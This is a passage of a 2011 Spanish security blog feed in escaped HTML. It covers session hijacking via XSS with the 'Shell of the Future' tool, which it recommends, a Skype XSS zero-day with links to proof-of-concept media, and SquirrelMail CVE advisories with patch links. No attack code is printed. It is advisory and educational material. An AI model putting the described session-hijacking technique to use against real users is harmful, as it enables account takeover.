padding-top: 0cm;"&gt;Fig 4. Consola de Shell of the Future donde se muestra una sesión de usuario robada&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;span class="apple-style-span"&gt;&lt;i&gt;&lt;span style="border-bottom-color: windowtext; border-bottom-style: none; border-bottom-width: 1pt; border-left-color: windowtext; border-left-style: none; border-left-width: 1pt; border-right-color: windowtext; border-right-style: none; border-right-width: 1pt; border-top-color: windowtext; border-top-style: none; border-top-width: 1pt; color: #333333; font-family: 'Trebuchet MS', sans-serif; font-size: 8.5pt; padding-bottom: 0cm; padding-left: 0cm; padding-right: 0cm; padding-top: 0cm;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://3.bp.blogspot.com/-HoP6_ln8BLA/TiRCfCvSC7I/AAAAAAAAANk/X6HUbMX840E/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="228" src="http://3.bp.blogspot.com/-HoP6_ln8BLA/TiRCfCvSC7I/AAAAAAAAANk/X6HUbMX840E/s400/5.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="apple-style-span"&gt;&lt;i style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-color: initial; border-style: initial; outline-color: initial; outline-style: initial; outline-width: 0px;"&gt;&lt;span style="border-bottom-color: windowtext; border-bottom-style: none; border-bottom-width: 1pt; border-left-color: windowtext; border-left-style: none; border-left-width: 1pt; border-right-color: windowtext; border-right-style: none; border-right-width: 1pt; border-top-color: windowtext; border-top-style: none; border-top-width: 1pt; color: #333333; font-size: 10pt; padding-bottom: 0cm; padding-left: 0cm; padding-right: 0cm; padding-top: 0cm;"&gt;Fig 5. Desde la consola de SOTF se puede acceder a la sesión robada y se incluye un banner personalizable "Session Hijacked by..."&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="apple-style-span"&gt;&lt;b&gt;&lt;span style="border-bottom-color: windowtext; border-bottom-style: none; border-bottom-width: 1pt; border-left-color: windowtext; border-left-style: none; border-left-width: 1pt; border-right-color: windowtext; border-right-style: none; border-right-width: 1pt; border-top-color: windowtext; border-top-style: none; border-top-width: 1pt; color: #333333; font-size: 10pt; padding-bottom: 0cm; padding-left: 0cm; padding-right: 0cm; padding-top: 0cm;"&gt;Shell of the Future&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class="apple-converted-space"&gt;&lt;span style="color: #333333; font-size: 10pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="apple-style-span"&gt;&lt;span style="color: #333333; font-size: 10pt;"&gt;no guarda históricos pero su facilidad de uso y que no precisa de instalación alguna lo convierten en una aplicación más que recomendable.&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: 10pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 10pt;"&gt;Referencia&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 10pt;"&gt;: &lt;a href="http://www.hacktimes.com/robo_de_sesiones_http_mediante_xss/"&gt;http://www.hacktimes.com/robo_de_sesiones_http_mediante_xss/&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-503321868162387773?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/07/robo-de-sesiones-http-mediante-xss.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-cjWoqUApxYw/TiRCdQN-uDI/AAAAAAAAANU/2NQ46qSOrcs/s72-c/1.jpg" height="72" width="72" /></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-9020820104732060949</guid><pubDate>Fri, 15 Jul 2011 18:10:00 +0000</pubDate><atom:updated>2011-07-15T14:10:55.802-04:00</atom:updated><title>0day XSS en Skype</title><description>&lt;div class="mobile-photo"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="apple-style-span"&gt;&lt;span style="color: black; font-size: 10.0pt;"&gt;Levent Kayan (noptrix), ha reportado una vulnerabilidad de &lt;a href="http://es.wikipedia.org/wiki/Cross-site_scripting"&gt;cross-site scripting&lt;/a&gt; permanente en &lt;a href="http://www.skype.com/"&gt;Skype&lt;/a&gt; que afecta a las versiones anteriores a 5.3.0.120 y las plataformas Windows XP, Vista, 7 y Mac OS X.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="apple-style-span"&gt;&lt;span style="color: black; font-size: 10.0pt;"&gt;Como todos los &lt;a href="http://es.wikipedia.org/wiki/Cross-site_scripting"&gt;cross-site scripting&lt;/a&gt;, el error está causado por una falta de validación de los datos introducidos en la entrada del perfil "Mobile phone". Esto permite a un atacante remoto obtener el identificador de sesión de la víctima y por tanto, secuestrar su identidad. El descubridor no descarta que otros campos sufran el mismo problema. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: black; font-size: 10.0pt;"&gt;&lt;br /&gt;
&lt;span class="apple-style-span"&gt;Levent Kayan ha publicado una prueba de concepto que demuestra la vulnerabilidad, utilizando un iframe y la función onload de JavaScript. Afirma que avisará a Skype del problema, por tanto no existe parche oficial disponible.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="apple-style-span"&gt;&lt;b&gt;&lt;span style="color: black; font-size: 10.0pt;"&gt;Las PoC:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: black; font-size: 10.0pt; mso-fareast-language: ES;"&gt;&lt;a href="http://www.noptrix.net/tmp/skype_xss.png"&gt;http://www.noptrix.net/tmp/skype_xss.png&lt;/a&gt;&lt;/span&gt;&lt;span style="mso-fareast-language: ES;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: black; font-size: 10.0pt; mso-fareast-language: ES;"&gt;&lt;a href="http://www.noptrix.net/tmp/skype_linux.ogv"&gt;http://www.noptrix.net/tmp/skype_linux.ogv&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: black; font-size: 10.0pt; mso-fareast-language: ES;"&gt;&lt;a href="http://www.noptrix.net/tmp/skype_winxp.ogv"&gt;http://www.noptrix.net/tmp/skype_winxp.ogv&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="color: black; font-size: 10.0pt; mso-fareast-language: ES;"&gt;&lt;a href="http://www.noptrix.net/tmp/skype_win7.avi"&gt;http://www.noptrix.net/tmp/skype_win7.avi&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span style="font-size: 10.0pt;"&gt;Solución:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt;"&gt;Skype validó el input de investigador pero hasta el momento no se sabe de un parche.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-9020820104732060949?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/07/0day-xss-en-skype.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-8550946165358736667</guid><pubDate>Fri, 15 Jul 2011 17:57:00 +0000</pubDate><atom:updated>2011-07-15T13:57:46.015-04:00</atom:updated><title>Vulnerabilidades en SquirrelMail</title><description>&lt;div class="mobile-photo"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="apple-style-span"&gt;&lt;span style="color: black; font-size: 10.0pt;"&gt;Se han reportado tres vulnerabilidades en &lt;a href="http://www.squirrelmail.org/"&gt;SquirrelMail&lt;/a&gt; que afectan a las versiones 1.4.21 y anteriores. Un atacante remoto podría aprovechar estas vulnerabilidades para ejecutar ataques &lt;a href="http://es.wikipedia.org/wiki/Cross-site_scripting"&gt;cross-site scripting&lt;/a&gt; o eludir restricciones de seguridad.&lt;/span&gt;&lt;/span&gt;&lt;span style="color: black; font-size: 10.0pt;"&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="apple-style-span"&gt;&lt;b&gt;Las vulnerabilidades son las siguientes:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="apple-style-span"&gt;&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2023"&gt;CVE-2011-2023:&lt;/a&gt; Vulnerabilidad localizada en el fichero "functions/mime.php" al procesar los parámetros de entrada con tags de estilo y que podría permitir a un atacante remoto ejecutar código HTML arbitrario y sctipts con los privilegios del usuario que lance el navegador.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="apple-style-span"&gt;&lt;b&gt;&lt;span style="color: black; font-size: 10.0pt;"&gt;Parche:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class="apple-style-span"&gt;&lt;span style="color: black; font-size: 10.0pt;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: 10.0pt;"&gt;&lt;a href="http://squirrelmail.svn.sourceforge.net/viewvc/squirrelmail/branches/SM-1_4-STABLE/squirrelmail/functions/mime.php?view=patch&amp;amp;r1=14133&amp;amp;r2=14120&amp;amp;pathrev=14133"&gt;http://squirrelmail.svn.sourceforge.net/viewvc/squirrelmail/branches/SM-1_4-STABLE/squirrelmail/functions/mime.php?view=patch&amp;amp;r1=14133&amp;amp;r2=14120&amp;amp;pathrev=14133&lt;/a&gt;&lt;span style="color: black;"&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="apple-style-span"&gt;&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4554"&gt;CVE-2010-4554:&lt;/a&gt; Vulnerabilidad causada por no validar correctamente una petición HTTP. Esto podría ser aprovechada por un atacante remoto para obtener información sensible a través de una página especialmente manipulada.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="apple-style-span"&gt;&lt;b&gt;&lt;span style="color: black; font-size: 10.0pt;"&gt;Parche: &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size: 10.0pt;"&gt;&lt;a href="http://squirrelmail.svn.sourceforge.net/viewvc/squirrelmail/branches/SM-1_4-STABLE/squirrelmail/functions/page_header.php?view=patch&amp;amp;r1=14117&amp;amp;r2=14116&amp;amp;pathrev=14117"&gt;http://squirrelmail.svn.sourceforge.net/viewvc/squirrelmail/branches/SM-1_4-STABLE/squirrelmail/functions/page_header.php?view=patch&amp;amp;r1=14117&amp;amp;r2=14116&amp;amp;pathrev=14117&lt;/a&gt;&lt;span style="color: black;"&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="apple-style-span"&gt;&lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4555"&gt;CVE-2010-4555:&lt;/a&gt; Vulnerabilidad localizada en el fichero "functions/options.php" al no procesar correctamente las entradas en una lista despegable. Podría ser aprovechado por un atacante remoto para inyectar código.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="apple-style-span"&gt;&lt;b&gt;&lt;span style="color: black; font-size: 10.0pt;"&gt;Parche:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class="apple-style-span"&gt;&lt;span style="color: black; font-size: 10.0pt;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: 10.0pt;"&gt;&lt;a href="http://squirrelmail.svn.sourceforge.net/viewvc/squirrelmail?view=revision&amp;amp;revision=14119"&gt;http://squirrelmail.svn.sourceforge.net/viewvc/squirrelmail?view=revision&amp;amp;revision=14119&lt;/a&gt;&lt;span style="color: black;"&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="apple-style-span"&gt;El corrector ortográfico de SquirrelMail tampoco procesa adecuadamente el carácter "&amp;gt;" a la hora de devolver un texto al usuario, pudiendo devolver un código HTML erróneo que podría ser aprovechado por un atacante remoto para realizar un ataque cross-site scripting.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="apple-style-span"&gt;Las vulnerabilidades han sido corregidas en la versión 1.4.22 y puede ser descargada desde la página oficial&lt;/span&gt;&lt;br /&gt;
&lt;span class="apple-style-span"&gt;&lt;a href="http://www.squirrelmail.org/download.php" target="_blank"&gt;&lt;span style="color: #114170;"&gt;http://www.squirrelmail.org/download.php&lt;/span&gt;&lt;/a&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="apple-style-span"&gt;&lt;b&gt;Más información:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="apple-style-span"&gt;SquirrelMail Security Advisories&lt;/span&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="MsoHyperlink"&gt;&lt;a href="http://www.squirrelmail.org/security/issue/2011-07-10" target="_blank"&gt;&lt;span style="font-size: 10.0pt;"&gt;http://www.squirrelmail.org/security/issue/2011-07-10&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;u&gt;&lt;span style="color: blue;"&gt;&lt;br /&gt;
&lt;span class="MsoHyperlink"&gt;&lt;a href="http://www.squirrelmail.org/security/issue/2011-07-11" target="_blank"&gt;&lt;span style="font-size: 10.0pt;"&gt;http://www.squirrelmail.org/security/issue/2011-07-11&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="MsoHyperlink"&gt;&lt;a href="http://www.squirrelmail.org/security/issue/2011-07-12" target="_blank"&gt;&lt;span style="font-size: 10.0pt;"&gt;http://www.squirrelmail.org/security/issue/2011-07-12&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b&gt;&lt;span style="font-size: 10.0pt;"&gt;Sistemas Afectados:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="mso-cellspacing: 0cm; mso-padding-alt: 0cm 0cm 0cm 0cm; mso-yfti-tbllook: 1184;"&gt;&lt;tbody&gt;
&lt;tr style="mso-yfti-firstrow: yes; mso-yfti-irow: 0; mso-yfti-lastrow: yes;"&gt;   &lt;td style="padding: 3.0pt 3.0pt 3.0pt 3.0pt;" valign="top"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #666666; font-size: 10.0pt; mso-fareast-language: ES;"&gt;Vulnerable:&lt;/span&gt;&lt;span style="font-size: 10.0pt; mso-fareast-language: ES;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 3.0pt 3.0pt 3.0pt 3.0pt;" valign="top"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-fareast-language: ES;"&gt;SquirrelMail   SquirrelMail 1.4.21&lt;br /&gt;
&lt;span style="color: #666666;"&gt;+ MandrakeSoft Corporate Server 3.0 x86_64&lt;br /&gt;
+ MandrakeSoft Corporate Server 3.0&lt;br /&gt;
+ Red Hat Fedora Core2&lt;br /&gt;
&lt;/span&gt;SquirrelMail SquirrelMail 1.4.20&lt;br /&gt;
SquirrelMail SquirrelMail 1.4.19&lt;br /&gt;
SquirrelMail SquirrelMail 1.4.18&lt;br /&gt;
SquirrelMail SquirrelMail 1.4.17&lt;br /&gt;
SquirrelMail SquirrelMail 1.4.16&lt;br /&gt;
SquirrelMail SquirrelMail 1.4.15&lt;br /&gt;
SquirrelMail SquirrelMail 1.4.12&lt;br /&gt;
SquirrelMail SquirrelMail 1.4.11&lt;br /&gt;
SquirrelMail SquirrelMail 1.4.9 a&lt;br /&gt;
&lt;span style="color: #666666;"&gt;+ Debian Linux 4.0&lt;br /&gt;
&lt;/span&gt;SquirrelMail SquirrelMail 1.4.8&lt;br /&gt;
SquirrelMail SquirrelMail 1.4.7&lt;br /&gt;
SquirrelMail SquirrelMail 1.4.6 -rc1&lt;br /&gt;
SquirrelMail SquirrelMail 1.4.6 -cvs&lt;br /&gt;
SquirrelMail SquirrelMail 1.4.6&lt;br /&gt;
SquirrelMail SquirrelMail 1.4.5&lt;br /&gt;
&lt;span style="color: #666666;"&gt;+ MandrakeSoft Corporate Server 3.0 x86_64&lt;br /&gt;
+ MandrakeSoft Corporate Server 3.0&lt;br /&gt;
+ MandrakeSoft Corporate Server 3.0&lt;br /&gt;
+ MandrakeSoft Corporate Server 3.0&lt;br /&gt;
&lt;/span&gt;SquirrelMail SquirrelMail 1.4.4 RC1&lt;br /&gt;
SquirrelMail SquirrelMail 1.4.4&lt;br /&gt;
&lt;span style="color: #666666;"&gt;+ Debian Linux 3.1 sparc&lt;br /&gt;
+ Debian Linux 3.1 s/390&lt;br /&gt;
+ Debian Linux 3.1 s/390&lt;br /&gt;
+ Debian Linux 3.1 s/390&lt;br /&gt;
+ Debian Linux 3.1 ppc&lt;br /&gt;
+ Debian Linux 3.1 ppc&lt;br /&gt;
+ Debian Linux 3.1 ppc&lt;br /&gt;
+ Debian Linux 3.1 mipsel&lt;br /&gt;
+ Debian Linux 3.1 mipsel&lt;br /&gt;
+ Debian Linux 3.1 mipsel&lt;br /&gt;
+ Debian Linux 3.1 mips&lt;br /&gt;
+ Debian Linux 3.1 mips&lt;br /&gt;
+ Debian Linux 3.1 mips&lt;br /&gt;
+ Debian Linux 3.1 m68k&lt;br /&gt;
+ Debian Linux 3.1 m68k&lt;br /&gt;
+ Debian Linux 3.1 m68k&lt;br /&gt;
+ Debian Linux 3.1 ia-64&lt;br /&gt;
+ Debian Linux 3.1 ia-64&lt;br /&gt;
+ Debian Linux 3.1 ia-64&lt;br /&gt;
+ Debian Linux 3.1 ia-32&lt;br /&gt;
+ Debian Linux 3.1 ia-32&lt;br /&gt;
+ Debian Linux 3.1 ia-32&lt;br /&gt;
+ Debian Linux 3.1 hppa&lt;br /&gt;
+ Debian Linux 3.1 hppa&lt;br /&gt;
+ Debian Linux 3.1 hppa&lt;br /&gt;
+ Debian Linux 3.1 arm&lt;br /&gt;
+ Debian Linux 3.1 arm&lt;br /&gt;
+ Debian Linux 3.1 arm&lt;br /&gt;
+ Debian Linux 3.1 alpha&lt;br /&gt;
+ Debian Linux 3.1 alpha&lt;br /&gt;
+ Debian Linux 3.1 alpha&lt;br /&gt;
+ Debian Linux 3.1&lt;br /&gt;
+ Debian Linux 3.1&lt;br /&gt;
+ Debian Linux 3.1&lt;br /&gt;
+ Gentoo Linux&lt;br /&gt;
+ Gentoo Linux&lt;br /&gt;
+ Gentoo Linux&lt;br /&gt;
&lt;/span&gt;SquirrelMail SquirrelMail 1.4.3 RC1&lt;br /&gt;
SquirrelMail SquirrelMail 1.4.3 r3&lt;br /&gt;
&lt;span style="color: #666666;"&gt;+ Gentoo Linux&lt;br /&gt;
&lt;/span&gt;SquirrelMail SquirrelMail 1.4.3 a&lt;br /&gt;
&lt;span style="color: #666666;"&gt;+ Conectiva Linux 9.0&lt;br /&gt;
+ Red Hat Fedora Core3&lt;br /&gt;
+ Red Hat Fedora Core3&lt;br /&gt;
+ Red Hat Fedora Core3&lt;br /&gt;
+ Red Hat Fedora Core2&lt;br /&gt;
+ Red Hat Fedora Core2&lt;br /&gt;
&lt;/span&gt;SquirrelMail SquirrelMail 1.4.3&lt;br /&gt;
SquirrelMail SquirrelMail 1.4.2&lt;br /&gt;
&lt;span style="color: #666666;"&gt;+ MandrakeSoft Corporate Server 3.0 x86_64&lt;br /&gt;
+ MandrakeSoft Corporate Server 3.0&lt;br /&gt;
+ MandrakeSoft Corporate Server 3.0&lt;br /&gt;
+ MandrakeSoft Corporate Server 3.0&lt;br /&gt;
+ Red Hat Fedora Core2&lt;br /&gt;
+ Red Hat Fedora Core2&lt;br /&gt;
+ Red Hat Fedora Core2&lt;br /&gt;
&lt;/span&gt;SquirrelMail SquirrelMail 1.4.1&lt;br /&gt;
SquirrelMail SquirrelMail 1.4 RC1&lt;br /&gt;
SquirrelMail SquirrelMail 1.4&lt;br /&gt;
SquirrelMail SquirrelMail 1.2.11&lt;br /&gt;
SquirrelMail SquirrelMail 1.2.10&lt;br /&gt;
SquirrelMail SquirrelMail 1.2.9&lt;br /&gt;
SquirrelMail SquirrelMail 1.2.8&lt;br /&gt;
&lt;span style="color: #666666;"&gt;+ Terra Soft Solutions Yellow Dog Linux 3.0&lt;br /&gt;
&lt;/span&gt;SquirrelMail SquirrelMail 1.2.7&lt;br /&gt;
&lt;span style="color: #666666;"&gt;+ RedHat Linux 8.0&lt;br /&gt;
&lt;/span&gt;SquirrelMail SquirrelMail 1.2.6&lt;br /&gt;
&lt;span style="color: #666666;"&gt;+ Debian Linux 3.0 sparc&lt;br /&gt;
+ Debian Linux 3.0 s/390&lt;br /&gt;
+ Debian Linux 3.0 s/390&lt;br /&gt;
+ Debian Linux 3.0 ppc&lt;br /&gt;
+ Debian Linux 3.0 ppc&lt;br /&gt;
+ Debian Linux 3.0 mipsel&lt;br /&gt;
+ Debian Linux 3.0 mipsel&lt;br /&gt;
+ Debian Linux 3.0 mips&lt;br /&gt;
+ Debian Linux 3.0 mips&lt;br /&gt;
+ Debian Linux 3.0 m68k&lt;br /&gt;
+ Debian Linux 3.0 m68k&lt;br /&gt;
+ Debian Linux 3.0 ia-64&lt;br /&gt;
+ Debian Linux 3.0 ia-64&lt;br /&gt;
+ Debian Linux 3.0 ia-32&lt;br /&gt;
+ Debian Linux 3.0 ia-32&lt;br /&gt;
+ Debian Linux 3.0 hppa&lt;br /&gt;
+ Debian Linux 3.0 hppa&lt;br /&gt;
+ Debian Linux 3.0 arm&lt;br /&gt;
+ Debian Linux 3.0 arm&lt;br /&gt;
+ Debian Linux 3.0 alpha&lt;br /&gt;
+ Debian Linux 3.0 alpha&lt;br /&gt;
+ Debian Linux 3.0&lt;br /&gt;
+ Debian Linux 3.0&lt;br /&gt;
&lt;/span&gt;SquirrelMail SquirrelMail 1.2.5&lt;br /&gt;
SquirrelMail SquirrelMail 1.2.4&lt;br /&gt;
SquirrelMail SquirrelMail 1.2.3&lt;br /&gt;
SquirrelMail SquirrelMail 1.2.2&lt;br /&gt;
SquirrelMail SquirrelMail 1.2.1&lt;br /&gt;
SquirrelMail SquirrelMail 1.2 .0&lt;br /&gt;
SquirrelMail SquirrelMail 1.0.5&lt;br /&gt;
SquirrelMail SquirrelMail 1.0.4&lt;br /&gt;
SquirrelMail SquirrelMail 1.4.20 RC2&lt;br /&gt;
SquirrelMail SquirelMail 1.4.10&lt;br /&gt;
SquirrelMail SquirelMail 1.4.10a&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-8550946165358736667?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/07/vulnerabilidades-en-squirrelmail.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-2885138405017572264</guid><pubDate>Fri, 15 Jul 2011 14:01:00 +0000</pubDate><atom:updated>2011-07-15T10:01:35.500-04:00</atom:updated><title>Resumen de Vulnerabilidades - Semana 29</title><description>&lt;div class="mobile-photo"&gt;&lt;/div&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; @RISK: The Consensus Security Vulnerability Alert&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Week 29 2011&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
&lt;span class="apple-style-span"&gt;&lt;span style="color: black;"&gt;Summary of Updates and Vulnerabilities in this Consensus&lt;/span&gt;&lt;/span&gt;&lt;span style="color: black;"&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="apple-style-span"&gt;Platform &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Number of Updates and Vulnerabilities&lt;/span&gt;&lt;br /&gt;
&lt;span class="apple-style-span"&gt;- ------------------------ &amp;nbsp; &amp;nbsp; &amp;nbsp;-------------------------------------&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="apple-style-span"&gt;Windows &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 3 (#1)&lt;/span&gt;&lt;br /&gt;
&lt;span class="apple-style-span"&gt;Third Party Windows Apps &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;6 (#2)&lt;/span&gt;&lt;br /&gt;
&lt;span class="apple-style-span"&gt;Linux &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 1&lt;/span&gt;&lt;br /&gt;
&lt;span class="apple-style-span"&gt;HP-UX &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 1&lt;/span&gt;&lt;br /&gt;
&lt;span class="apple-style-span"&gt;Cross Platform &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;7&lt;/span&gt;&lt;br /&gt;
&lt;span class="apple-style-span"&gt;Web Application &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 3&lt;/span&gt;&lt;br /&gt;
